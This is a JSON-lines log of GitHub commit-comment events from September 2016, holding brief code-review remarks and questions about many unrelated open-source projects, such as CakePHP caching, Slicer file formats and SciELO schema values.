devices (large desktops, 1200px and up) */\r\n@media (min-width: @screen-lg-min) { ... }\r\n~~~"}},"created_at":"2016-09-13T13:28:49Z"}
{"id":"4555582190","type":"CommitCommentEvent","actor":{"login":"excetara2"},"repo":{"name":"aziz/SublimeFileBrowser"},"payload":{"comment":{"id":19001430,"position":null,"line":null,"path":null,"commit_id":"85539d8dc9e61b85b1baef451d0292d51f616654","created_at":"2016-09-13T13:29:08Z","updated_at":"2016-09-13T13:29:08Z","body":"I just tried getting this from package control and the problem still persists. How long does it usually take to get pushed there?"}},"created_at":"2016-09-13T13:29:08Z"}
{"id":"4555583728","type":"CommitCommentEvent","actor":{"login":"at-sixes-and-sevens"},"repo":{"name":"at-sixes-and-sevens/helloworld"},"payload":{"comment":{"id":19001434,"position":null,"line":null,"path":null,"commit_id":"09e632a91c4cd5eb197130a01f6fc585e3c7c005","created_at":"2016-09-13T13:29:23Z","updated_at":"2016-09-13T13:29:23Z","body":"hi"}},"created_at":"2016-09-13T13:29:23Z"}
{"id":"4555584767","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001438,"position":184,"line":184,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:29:32Z","updated_at":"2016-09-13T13:29:32Z","body":"Please leave a blank line."}},"created_at":"2016-09-13T13:29:32Z"}
{"id":"4555588347","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001447,"position":207,"line":207,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:30:14Z","updated_at":"2016-09-13T13:30:14Z","body":"function description ?"}},"created_at":"2016-09-13T13:30:14Z"}
{"id":"4555589606","type":"CommitCommentEvent","actor":{"login":"JoshEngebretson"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":19001451,"position":7,"line":null,"path":"Source/AtomicNET/NETScript/CSComponentAssembly.cpp","commit_id":"9a0ac4aa9e6733241e1f5dcbb9d17a1ab05a4cac","created_at":"2016-09-13T13:30:26Z","updated_at":"2016-09-13T13:30:26Z","body":"Nope, not QtCreator, unless somehow the project overrided the global settings somehow, constant freaking battle!  I'll do a follow up which runs through sources for tabs, this will not stand...\r\n![screen shot 2016-09-13 at 6 27 54 am](https://cloud.githubusercontent.com/assets/376203/18475467/52e3ad6c-797b-11e6-88ad-329315d50994.png)\r\n"}},"created_at":"2016-09-13T13:30:26Z"}
{"id":"4555589700","type":"CommitCommentEvent","actor":{"login":"ritesh-pandey"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":19001452,"position":13,"line":335,"path":"lib/Cake/Cache/Engine/FileEngine.php","commit_id":"f5859ca7193dcd82433fb0f617d64b1fbd380801","created_at":"2016-09-13T13:30:26Z","updated_at":"2016-09-13T13:30:26Z","body":"@dereuromark How will cache files be created in `debug = 0` (production) mode after deployment?\r\n\r\nI have raised my concern here.\r\nhttp://discourse.cakephp.org/t/deployment-strategy/575/7?u=riteshpandey"}},"created_at":"2016-09-13T13:30:26Z"}
{"id":"4555591566","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19001456,"position":191,"line":191,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-13T13:30:45Z","updated_at":"2016-09-13T13:30:45Z","body":"function description ?"}},"created_at":"2016-09-13T13:30:45Z"}
{"id":"4555596421","type":"CommitCommentEvent","actor":{"login":"boutros"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":19001467,"position":11,"line":381,"path":"redef/services/src/main/java/no/deichman/services/entity/repository/SPARQLQueryBuilder.java","commit_id":"481319fc719541a93a84f8bac37e39d6c28c8fd8","created_at":"2016-09-13T13:31:34Z","updated_at":"2016-09-13T13:31:34Z","body":"https://github.com/digibib/ls.ext/commit/116767ec6e0fb83fad62b2dfb45010a744c5bcff"}},"created_at":"2016-09-13T13:31:34Z"}
{"id":"4555599816","type":"CommitCommentEvent","actor":{"login":"cwdick"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19001478,"position":null,"line":null,"path":null,"commit_id":"2bd5b0b440f6c5d60b65407429bf2c10222619b0","created_at":"2016-09-13T13:32:06Z","updated_at":"2016-09-13T13:32:06Z","body":"Unfortunately no, this is not enough. We still do some transforms after Babel without updating the sourcemaps, which shifts column numbers enough to mess up debugging because modules are all on one line.\r\n\r\nA workaround would be to use an non-minified bundle, then the source column numbers being wrong don't matter much because they only affect a few lines."}},"created_at":"2016-09-13T13:32:06Z"}
{"id":"4555600372","type":"CommitCommentEvent","actor":{"login":"ranisalt"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":19001482,"position":null,"line":null,"path":null,"commit_id":"b7fb97cb1c9d2c92cb28d10ea0cdb0c0943a5fb1","created_at":"2016-09-13T13:32:15Z","updated_at":"2016-09-13T13:32:15Z","body":"@andersonfaaria hmm I was only thinking on path walking, not ranged monsters, you may be right"}},"created_at":"2016-09-13T13:32:15Z"}
{"id":"4555602255","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19001487,"position":null,"line":null,"path":null,"commit_id":"ebe3c4ddc9719df12e83fb7897c31e269b6410ab","created_at":"2016-09-13T13:32:34Z","updated_at":"2016-09-13T13:32:34Z","body":"hype o:"}},"created_at":"2016-09-13T13:32:34Z"}
{"id":"4555602513","type":"CommitCommentEvent","actor":{"login":"dunn"},"repo":{"name":"ckolderup/streets-n-sheets"},"payload":{"comment":{"id":19001488,"position":null,"line":null,"path":null,"commit_id":"fb8ea37dd6a7ef1dce7edbc68dd18efb560b96c1","created_at":"2016-09-13T13:32:36Z","updated_at":"2016-09-13T13:32:36Z","body":":D "}},"created_at":"2016-09-13T13:32:36Z"}
{"id":"4555604430","type":"CommitCommentEvent","actor":{"login":"paxtonhare"},"repo":{"name":"marklogic/RunDMC"},"payload":{"comment":{"id":19001489,"position":null,"line":null,"path":null,"commit_id":"2e326f030158c3d30e356a72f60dbb379d1014c3","created_at":"2016-09-13T13:32:55Z","updated_at":"2016-09-13T13:32:55Z","body":"@dmcassel yes it can be merged. Do you want the honor of the code review?"}},"created_at":"2016-09-13T13:32:55Z"}
{"id":"4555613084","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19001498,"position":null,"line":null,"path":null,"commit_id":"64844efbaa5b197eccc862286ae68d9fc39c6e6c","created_at":"2016-09-13T13:34:24Z","updated_at":"2016-09-13T13:34:24Z","body":"adding that the Wanderers usually don't even need any"}},"created_at":"2016-09-13T13:34:24Z"}
{"id":"4555615160","type":"CommitCommentEvent","actor":{"login":"minsikl"},"repo":{"name":"srinivasdandibhotla/terraform-provider-softlayer"},"payload":{"comment":{"id":19001501,"position":26,"line":55,"path":"softlayer/resource_softlayer_network_vlan.go","commit_id":"246745f964c0ff0883217bca90668e036f40a3cc","created_at":"2016-09-13T13:34:45Z","updated_at":"2016-09-13T13:34:45Z","body":"Forcenew fields\r\ndatacenter, type, primary_router_hostname, vlan_number"}},"created_at":"2016-09-13T13:34:45Z"}
{"id":"4555615214","type":"CommitCommentEvent","actor":{"login":"ihnorton"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":19001502,"position":68,"line":911,"path":"Libs/MRML/Core/vtkMRMLStorageNode.cxx","commit_id":"cfdf8cc590450e5bcbe13b75c9cc6a9b5019883e","created_at":"2016-09-13T13:34:45Z","updated_at":"2016-09-13T13:34:45Z","body":"Thanks, will investigate test non-failure (most of them don't do a full setup, only registering the necessary nodes, so the FreeSurfer nodes probably weren't available to take priority)\r\n\r\nCould you please also consider the following patch. Currently the initialized FreeSurfer formats are discarded because they are given as extension-only rather than full format specifier (there are several modules where this is the case). The old code handled this case, but the format helper does not:\r\n\r\nhttps://github.com/ihnorton/Slicer/commit/4cb87d42dd88d3f9b2b7361a3c18742872aca018"}},"created_at":"2016-09-13T13:34:45Z"}
{"id":"4555623063","type":"CommitCommentEvent","actor":{"login":"oooua00"},"repo":{"name":"yokrysty/LoLAccountChecker"},"payload":{"comment":{"id":19001518,"position":null,"line":null,"path":null,"commit_id":"727412ce4bd41c12ac1f6d2fabc5c75f53b34034","created_at":"2016-09-13T13:36:05Z","updated_at":"2016-09-13T13:36:05Z","body":"jp server add please.."}},"created_at":"2016-09-13T13:36:05Z"}
{"id":"4555623076","type":"CommitCommentEvent","actor":{"login":"TYoung86"},"repo":{"name":"schme16/gitcdn.xyz"},"payload":{"comment":{"id":19001519,"position":null,"line":null,"path":null,"commit_id":"8b65bb5ea63326f582a357332f02601b98540583","created_at":"2016-09-13T13:36:05Z","updated_at":"2016-09-13T13:36:05Z","body":"related to https://github.com/schme16/gitcdn.xyz/issues/10 ?"}},"created_at":"2016-09-13T13:36:05Z"}
{"id":"4555624692","type":"CommitCommentEvent","actor":{"login":"ihnorton"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":19001523,"position":68,"line":911,"path":"Libs/MRML/Core/vtkMRMLStorageNode.cxx","commit_id":"cfdf8cc590450e5bcbe13b75c9cc6a9b5019883e","created_at":"2016-09-13T13:36:22Z","updated_at":"2016-09-13T13:36:22Z","body":"Hmm, I guess that patch does not handle the case where there are multiple dots in the extension. The previous code did not either as far as I can tell."}},"created_at":"2016-09-13T13:36:22Z"}
{"id":"4555626820","type":"CommitCommentEvent","actor":{"login":"minsikl"},"repo":{"name":"srinivasdandibhotla/terraform-provider-softlayer"},"payload":{"comment":{"id":19001527,"position":56,"line":95,"path":"softlayer/resource_softlayer_network_vlan.go","commit_id":"246745f964c0ff0883217bca90668e036f40a3cc","created_at":"2016-09-13T13:36:42Z","updated_at":"2016-09-13T13:36:42Z","body":"If primary_router_hostname starts with `fcr`, type is `public'. If primary_router_hostname starts with 'bcr', type is 'private'."}},"created_at":"2016-09-13T13:36:42Z"}
{"id":"4555627178","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19001528,"position":null,"line":null,"path":null,"commit_id":"9182edaccb61303f43c4d1f973b7469af0dca21c","created_at":"2016-09-13T13:36:46Z","updated_at":"2016-09-13T13:36:46Z","body":":+1: "}},"created_at":"2016-09-13T13:36:46Z"}
{"id":"4555632604","type":"CommitCommentEvent","actor":{"login":"dereuromark"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":19001541,"position":13,"line":335,"path":"lib/Cake/Cache/Engine/FileEngine.php","commit_id":"f5859ca7193dcd82433fb0f617d64b1fbd380801","created_at":"2016-09-13T13:37:41Z","updated_at":"2016-09-13T13:37:41Z","body":"That is up to you. Not part of the core framework itself."}},"created_at":"2016-09-13T13:37:41Z"}
{"id":"4555636483","type":"CommitCommentEvent","actor":{"login":"BrandonOCasey"},"repo":{"name":"misteroneill/generator-videojs-plugin"},"payload":{"comment":{"id":19001557,"position":null,"line":null,"path":null,"commit_id":"f3793bc7604e91d6089cdb05a1e2f411ef515203","created_at":"2016-09-13T13:38:23Z","updated_at":"2016-09-13T13:38:23Z","body":"Going to do some testing to verify that this fixes the issues with one project using another, LGTM though"}},"created_at":"2016-09-13T13:38:23Z"}
{"id":"4555637484","type":"CommitCommentEvent","actor":{"login":"RichiH"},"repo":{"name":"prometheus/snmp_exporter"},"payload":{"comment":{"id":19001561,"position":69,"line":347,"path":"main.go","commit_id":"fb67884e0462b912cf5500ed17814eff60056641","created_at":"2016-09-13T13:38:33Z","updated_at":"2016-09-13T13:38:33Z","body":"Shouldn't those have a reason label along the lines of `prometheus_local_storage_out_of_order_samples_total`?"}},"created_at":"2016-09-13T13:38:33Z"}
{"id":"4555639829","type":"CommitCommentEvent","actor":{"login":"ppescher"},"repo":{"name":"geolink/opentracker"},"payload":{"comment":{"id":19001567,"position":null,"line":null,"path":null,"commit_id":"def3fb8bae307c41dd8fb86d08fc6d4ed9b479c7","created_at":"2016-09-13T13:38:56Z","updated_at":"2016-09-13T13:38:56Z","body":"Yes, you are right. A matching cpu_full_speed() is missing in exit_low_power(). It should go before usb_console_restore().\r\nIt would be great if you could test it. Thanks."}},"created_at":"2016-09-13T13:38:56Z"}
{"id":"4555648751","type":"CommitCommentEvent","actor":{"login":"minsikl"},"repo":{"name":"srinivasdandibhotla/terraform-provider-softlayer"},"payload":{"comment":{"id":19001584,"position":72,"line":129,"path":"softlayer/resource_softlayer_network_vlan.go","commit_id":"246745f964c0ff0883217bca90668e036f40a3cc","created_at":"2016-09-13T13:40:26Z","updated_at":"2016-09-13T13:40:26Z","body":"\"note\" is an editable field as well."}},"created_at":"2016-09-13T13:40:26Z"}
{"id":"4555650227","type":"CommitCommentEvent","actor":{"login":"anonxy"},"repo":{"name":"Looking4Group/L4G_Core"},"payload":{"comment":{"id":19001587,"position":6,"line":38,"path":"src/scripts/scripts/zone/tempest_keep/the_eye/boss_alar.cpp","commit_id":"5d8b3e6596d1bafe53b921aa7d5897b2d6980d7f","created_at":"2016-09-13T13:40:39Z","updated_at":"2016-09-13T13:40:39Z","body":"Prenerf state was 3 embers in P1 (http://wowwiki.wikia.com/wiki/Al%27ar?oldid=601412) and 3 embers after each meteor in P2 (cant find proper source right now), will you change this as well?"}},"created_at":"2016-09-13T13:40:39Z"}
{"id":"4555650524","type":"CommitCommentEvent","actor":{"login":"adhg"},"repo":{"name":"adhg/pyDev1"},"payload":{"comment":{"id":19001588,"position":null,"line":null,"path":null,"commit_id":"73793d6b8f0cbc831215cb78faceefb9090c2318","created_at":"2016-09-13T13:40:42Z","updated_at":"2016-09-13T13:40:42Z","body":"and anther one."}},"created_at":"2016-09-13T13:40:42Z"}
{"id":"4555650618","type":"CommitCommentEvent","actor":{"login":"Vertex-Client"},"repo":{"name":"Vertex-Client/Vertex-Client-PE"},"payload":{"comment":{"id":19001589,"position":21,"line":0,"path":"Vertex Client PE.js","commit_id":"4ad0aca8549fc516694f66bd3219a4ceea75b71c","created_at":"2016-09-13T13:40:43Z","updated_at":"2016-09-13T13:40:43Z","body":"Ah ok."}},"created_at":"2016-09-13T13:40:43Z"}
{"id":"4555655053","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19001600,"position":null,"line":null,"path":null,"commit_id":"ccda4a3ddc52c60d81d1f9ae1f834025a1c5201a","created_at":"2016-09-13T13:41:27Z","updated_at":"2016-09-13T13:41:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 986](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13177&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-13T13:41:27Z"}
{"id":"4555656234","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19001604,"position":null,"line":null,"path":null,"commit_id":"1f2dc00382b977d4e56d09e910c39e22266ad4d2","created_at":"2016-09-13T13:41:39Z","updated_at":"2016-09-13T13:41:39Z","body":"It would have been better to put it in the ChamiloApi class.\r\nAlso, there is already a method called SessionManager::getCoachesByCourseSession(). This seems relatively close (although yours does much more). Maybe a link should be added between those too (like a PHPDoc comment \"\\@see\" )"}},"created_at":"2016-09-13T13:41:39Z"}
{"id":"4555657279","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/muscat"},"payload":{"comment":{"id":19001607,"position":null,"line":null,"path":null,"commit_id":"e7711324d49f00aa007996988381e961783f6c0f","created_at":"2016-09-13T13:41:49Z","updated_at":"2016-09-13T13:41:49Z","body":"Looks good except for the indentation"}},"created_at":"2016-09-13T13:41:49Z"}
{"id":"4555657931","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19001610,"position":37,"line":38,"path":"docs/source/tagset/elemento-related-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T13:41:55Z","updated_at":"2016-09-13T13:41:55Z","body":"Esse valor não me parece consistente com os demais. Seria melhor algo como *partially-retracted-article*. "}},"created_at":"2016-09-13T13:41:55Z"}
{"id":"4555661069","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-url-field"},"payload":{"comment":{"id":19001618,"position":null,"line":null,"path":null,"commit_id":"f748ea2e9e333e8a1ba4ca1e4cc8128cc3284fb3","created_at":"2016-09-13T13:42:29Z","updated_at":"2016-09-13T13:42:29Z","body":"We should avoid exposing DOM elements as part of the API, and rather use functions for the actions required by the field. \r\nIf we later need to modify the field to use more/other DOM elements or sub-components this will only make things more difficult. Additionally, it will be easier to debug."}},"created_at":"2016-09-13T13:42:29Z"}
{"id":"4555663887","type":"CommitCommentEvent","actor":{"login":"YsongSong"},"repo":{"name":"YsongSong/Weather-"},"payload":{"comment":{"id":19001625,"position":null,"line":null,"path":null,"commit_id":"60d106d8733fb6d13b2f75641e5c5321c6ee2a8d","created_at":"2016-09-13T13:42:59Z","updated_at":"2016-09-13T13:42:59Z","body":"测试类 调用接口 实现天气查询"}},"created_at":"2016-09-13T13:42:59Z"}
{"id":"4555664562","type":"CommitCommentEvent","actor":{"login":"Okalia"},"repo":{"name":"Okalia/PersonalBlog"},"payload":{"comment":{"id":19001630,"position":null,"line":null,"path":null,"commit_id":"449c7ee2c11386e4e6d970c7be92118dbd4e72ce","created_at":"2016-09-13T13:43:06Z","updated_at":"2016-09-13T13:43:06Z","body":"Ajax store and web-socket data update\r\n![article_comments](https://cloud.githubusercontent.com/assets/11776810/18475997/23745a26-79d1-11e6-86cd-02a89e64c3c0.png)\r\n"}},"created_at":"2016-09-13T13:43:06Z"}
{"id":"4555666219","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19001634,"position":4,"line":77,"path":"docs/source/tagset/elemento-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T13:43:23Z","updated_at":"2016-09-13T13:43:23Z","body":"Esse valor não me parece bom pois não diz nada sobre o tipo.. apenas que é algo parcial. Não deveria ser *partial-retraction* ?"}},"created_at":"2016-09-13T13:43:23Z"}
{"id":"4555674102","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/jMAVlib"},"payload":{"comment":{"id":19001658,"position":null,"line":null,"path":null,"commit_id":"09bf40fccdf0270074bd15c8f7ad4da5f143b696","created_at":"2016-09-13T13:44:44Z","updated_at":"2016-09-13T13:44:44Z","body":"I used Float[] as the return type here, since that seemed to work, and I maintained double precision as long as possible for accuracy. It seemed that Java wouldn't let me pass a primitive array to the mavlink message set method."}},"created_at":"2016-09-13T13:44:44Z"}
{"id":"4555676314","type":"CommitCommentEvent","actor":{"login":"sixes-sevens"},"repo":{"name":"at-sixes-and-sevens/helloworld"},"payload":{"comment":{"id":19001666,"position":null,"line":null,"path":null,"commit_id":"9ee9fe1efebd39516af0c5f917cbd59609cf2389","created_at":"2016-09-13T13:45:09Z","updated_at":"2016-09-13T13:45:09Z","body":"123"}},"created_at":"2016-09-13T13:45:09Z"}
{"id":"4555680100","type":"CommitCommentEvent","actor":{"login":"leticiaquino"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19001671,"position":4,"line":77,"path":"docs/source/tagset/elemento-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T13:45:44Z","updated_at":"2016-09-13T13:45:44Z","body":"@gustavofonseca é \"partial-retraction\". Veja como está no docs:\r\n\r\nhttp://docs.scielo.org/projects/scielo-publishing-schema/pt_BR/master/tagset/elemento-article.html"}},"created_at":"2016-09-13T13:45:44Z"}
{"id":"4555684436","type":"CommitCommentEvent","actor":{"login":"bangwu93"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19001680,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T13:46:31Z","updated_at":"2016-09-13T13:46:31Z","body":"Dear Vivian,\n\nI opened B1.txt and replaced nathan’s name with my own. Next, I committed and pushed from SourceTree. However, there was no message stating the conflict, the pushing went all smoothly, which is not supposed to be the case. Can you please kindly check from your side if B1.txt shows my name? \n\n \n\nThanks and Regards,\n\nBangwu\n\n \n\nFrom: Low Bao Ling Vivian [mailto:notifications@github.com] \nSent: Tuesday, 13 September 2016 9:28 PM\nTo: sunset1215/rcs <rcs@noreply.github.com>\nCc: bangwu93 <bangwu.hong@hotmail.com>; Mention <mention@noreply.github.com>\nSubject: Re: [sunset1215/rcs] added testing file - bangwu.txt (904fc6a)\n\n \n\n@bangwu93 <https://github.com/bangwu93>  Oh ok. Then it's all good. Btw, you should not rename the B1.txt, but instead open the file and add your name inside. After that, try pushing it, and you should get an error, stating there's a conflict. That's because Nathan has already pushed his commit here. Try to resolve the error, by pulling from the remote and rebase your current changes onto it. Try the rebase by creating a branch of master first, in case anything goes wrong. Once you got it right, do it on the master branch. After that, push your commit. Let me know if you can't get it working. I'll post some screenshots.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/sunset1215/rcs/commit/904fc6aff546e28c14ed88cfb28f544d05690602#commitcomment-19001410> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AUNh-qhoy24-IxwNHwQ_DvcC207qfoWbks5qpqTmgaJpZM4J7br3> .  <https://github.com/notifications/beacon/AUNh-lNQUEgynBbajLuu5iusrq16c7q-ks5qpqTmgaJpZM4J7br3.gif> \n\n"}},"created_at":"2016-09-13T13:46:31Z"}
{"id":"4555689750","type":"CommitCommentEvent","actor":{"login":"nerdyrasa"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19001693,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2016-09-13T13:47:25Z","updated_at":"2016-09-13T13:47:25Z","body":"Thanks for pointing this out. I found [this post](http://codereview.stackexchange.com/questions/52016/how-to-write-elegant-conditional-bits-of-markup-in-razor-views) that suggested using a helper method. That still doesn't get rid of the logic inside the View but it does seem like a cleaner way to do it.  I'd also be interested in other ways to do it if any one has other suggestions."}},"created_at":"2016-09-13T13:47:25Z"}
{"id":"4555689927","type":"CommitCommentEvent","actor":{"login":"loris"},"repo":{"name":"airbnb/javascript"},"payload":{"comment":{"id":19001694,"position":null,"line":null,"path":null,"commit_id":"6a72781121b2fd6709649d6d14b6a47ef0ad6042","created_at":"2016-09-13T13:47:25Z","updated_at":"2016-09-13T13:47:25Z","body":"@ljharb Not sure it should be enabled yet, it looks like it is not working with `async/await` functions\r\n`test('foobar', async t => { ... });`\r\n`test('foobar', async (t) => { ... });`\r\nboth triggers `arrow-parens` error"}},"created_at":"2016-09-13T13:47:25Z"}
{"id":"4555691930","type":"CommitCommentEvent","actor":{"login":"at-sixes-and-sevens"},"repo":{"name":"at-sixes-and-sevens/helloworld"},"payload":{"comment":{"id":19001698,"position":null,"line":null,"path":null,"commit_id":"9ee9fe1efebd39516af0c5f917cbd59609cf2389","created_at":"2016-09-13T13:47:46Z","updated_at":"2016-09-13T13:47:46Z","body":"22"}},"created_at":"2016-09-13T13:47:46Z"}
{"id":"4555693777","type":"CommitCommentEvent","actor":{"login":"lassoan"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":19001708,"position":68,"line":911,"path":"Libs/MRML/Core/vtkMRMLStorageNode.cxx","commit_id":"cfdf8cc590450e5bcbe13b75c9cc6a9b5019883e","created_at":"2016-09-13T13:48:05Z","updated_at":"2016-09-13T13:48:05Z","body":"Multiple dots handling is very important and they should be handled correctly now, see qSlicerCoreIOManagerTest1.cxx.\r\nIt's OK if you add a special case for handling cases where only file extension is specified but please log a warning there. Also, please change all cases where a bare extension is added to SupportedReadFileTypes. Could you also check what happens in the add data dialog in case of bare extension is specified (app.coreIOManager().loadNodes(filetype, properties))? Thanks!"}},"created_at":"2016-09-13T13:48:05Z"}
{"id":"4555694900","type":"CommitCommentEvent","actor":{"login":"paulaCrismaru"},"repo":{"name":"stefan-caraiman/cloudbase-init"},"payload":{"comment":{"id":19001711,"position":null,"line":null,"path":null,"commit_id":"9ddb45127b5eb46754a11bb6a2930fc1b97be473","created_at":"2016-09-13T13:48:16Z","updated_at":"2016-09-13T13:48:16Z","body":"Salut Stefan"}},"created_at":"2016-09-13T13:48:16Z"}
{"id":"4555695977","type":"CommitCommentEvent","actor":{"login":"leticiaquino"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19001714,"position":37,"line":38,"path":"docs/source/tagset/elemento-related-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T13:48:26Z","updated_at":"2016-09-13T13:48:26Z","body":"@gustavofonseca usamos o mesmo valor da JATS: http://jats.nlm.nih.gov/publishing/tag-library/1.0/n-yjj0.html"}},"created_at":"2016-09-13T13:48:26Z"}
{"id":"4555696469","type":"CommitCommentEvent","actor":{"login":"axelchalon"},"repo":{"name":"jolocom/little-sister"},"payload":{"comment":{"id":19001716,"position":4,"line":34,"path":"src/js/lib/agents/acl.js","commit_id":"6fa4509078095f69de925b059c927401ac7da9d9","created_at":"2016-09-13T13:48:30Z","updated_at":"2016-09-13T13:48:30Z","body":"- If there's an error in one of the promise, we most likely want to interrupt the whole chain; hence, it'd probably be better to remove the catch here, so that if there's an error in one of the promises, it will automatically jump to the catch at line 47.\r\n- Inside the catch, we most likely want to just console.error the error. Otherwise, if we throw inside the catch, then the error is uncaught, and it might mess things up in the rest of the code."}},"created_at":"2016-09-13T13:48:30Z"}
{"id":"4555697003","type":"CommitCommentEvent","actor":{"login":"martin-gorner"},"repo":{"name":"martin-gorner/tensorflow-mnist-tutorial"},"payload":{"comment":{"id":19001718,"position":null,"line":null,"path":null,"commit_id":"b010098ff0e4cddbc448fa4b24a5fec13e57ce31","created_at":"2016-09-13T13:48:34Z","updated_at":"2016-09-13T13:48:34Z","body":"Thank you for the suggestion. I'll do as you say."}},"created_at":"2016-09-13T13:48:34Z"}
{"id":"4555702227","type":"CommitCommentEvent","actor":{"login":"rajuileni"},"repo":{"name":"rajuileni/ileni"},"payload":{"comment":{"id":19001726,"position":null,"line":null,"path":null,"commit_id":"07102ca7650e96199321187872cdd971806d9fc3","created_at":"2016-09-13T13:49:23Z","updated_at":"2016-09-13T13:49:23Z","body":"i need to change something"}},"created_at":"2016-09-13T13:49:23Z"}
{"id":"4555703514","type":"CommitCommentEvent","actor":{"login":"mkhan935"},"repo":{"name":"mkhan935/hello-world"},"payload":{"comment":{"id":19001728,"position":null,"line":null,"path":null,"commit_id":"27ef686dbabcdb907bbbd994c419f042eca25167","created_at":"2016-09-13T13:49:36Z","updated_at":"2016-09-13T13:49:36Z","body":"Just learning how to push my file using git cmd"}},"created_at":"2016-09-13T13:49:36Z"}
{"id":"4555706368","type":"CommitCommentEvent","actor":{"login":"rajuileni"},"repo":{"name":"rajuileni/ileni"},"payload":{"comment":{"id":19001735,"position":null,"line":null,"path":null,"commit_id":"07102ca7650e96199321187872cdd971806d9fc3","created_at":"2016-09-13T13:50:05Z","updated_at":"2016-09-13T13:50:05Z","body":"\"data modified in first.txt\"\r\n"}},"created_at":"2016-09-13T13:50:05Z"}
{"id":"4555711076","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19001744,"position":4,"line":77,"path":"docs/source/tagset/elemento-article.rst","commit_id":"fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a","created_at":"2016-09-13T13:50:52Z","updated_at":"2016-09-13T13:50:52Z","body":"Hm existem commits que dizem respeito ao ticket #459 que ele não conhece… se alguém fizer oq eu fiz — olhar a mudança de regra pelo diff no github — vai se surpreender com uma regra errada disfarçada de certa.\n\n-Gustavo\n\nOn 13 de setembro de 2016 at 10:45:59, Letícia Aquino (notifications@github.com) wrote:\n> @gustavofonseca é \"partial-retraction\". Veja como está no docs:\n>  \n> http://docs.scielo.org/projects/scielo-publishing-schema/pt_BR/master/tagset/elemento-article.html  \n>  \n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/scieloorg/scielo_publishing_schema/commit/fc5d69bef74a5d8cdb88f8c913ed09e45d58b62a#commitcomment-19001671  \n\n"}},"created_at":"2016-09-13T13:50:52Z"}
{"id":"4555712424","type":"CommitCommentEvent","actor":{"login":"qiaozhanrong"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":19001751,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-13T13:51:04Z","updated_at":"2016-09-13T13:51:04Z","body":"就是在上面忽略了名称为`Release`的目录（VS经常生成二进制文件到这个目录），但是在下面取消忽略`./Release`这个目录"}},"created_at":"2016-09-13T13:51:04Z"}
